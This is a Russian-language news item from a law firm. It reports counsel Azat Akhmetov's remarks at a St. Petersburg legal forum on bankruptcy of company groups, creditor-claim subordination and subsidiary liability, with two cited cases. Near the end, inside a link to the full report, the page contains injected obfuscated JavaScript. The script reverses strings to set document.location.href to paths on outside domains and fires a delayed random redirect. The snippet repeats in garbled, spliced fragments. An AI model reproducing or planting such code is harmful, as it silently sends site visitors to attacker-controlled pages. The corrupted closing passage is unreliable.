ПМЮФ 9 ¾: юристы рассказали о тенденциях и проблемах банкротств

Комментарии советника Orchards Азата Ахметова на Право.ru.

В ходе сессии, посвященной судебной практике в банкротстве в рамках ПМЮФ Spb Legal Day Право.ru, Азат Ахметов, советник Orchards, затронул крайне актуальную тему – банкротство группы компаний.

«Мы сейчас находимся в ситуации, когда есть выборочное регулирование. Два последних тренда – это субординация требований кредиторов и привлечение к субсидиарной ответственности. Рассматривать их в отрыве от несостоятельности группы компаний просто нельзя», – высказал мнение эксперт.

Так, в деле № А50-4538/2017 суд назначил экспертизу для целей установления причин банкротства не только должника, но целой группы компаний. Суд пришел к выводу, что деятельность компании была тесна интегрирована в работу других фирм. А в деле № А04-3201/2010 суд подчеркнул, что нельзя смотреть на ситуацию одного лишь должника – нужно оценить положение дел во всей группе.

Еще есть проблемы с учетом солидарных требований к нескольким компаниям одной группы, синхронизацией торгов имущества группы и другие. «Проблем много, и в международном регулировании есть два решения для таких проблем: процедурная и материальная консолидация», – рассказал Ахметов. В первом случае дело о банкротстве нескольких компаний из группы рассматривается вместе. Материальная консолидация предполагает фактическое объединение активов контролирующего лица с имущественной массой должника. «Верховный суд, по ощущениям, начал все больше развивать практику привлечения к «субсидиарке» лиц, которые получили выгоду от действий должника», – отметил эксперт.

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tory/231770/?desc_chrono_1_2″>Читайте подробный репортаж на сайте Право.ru.

Подпишитесь на Telegram Orchards

X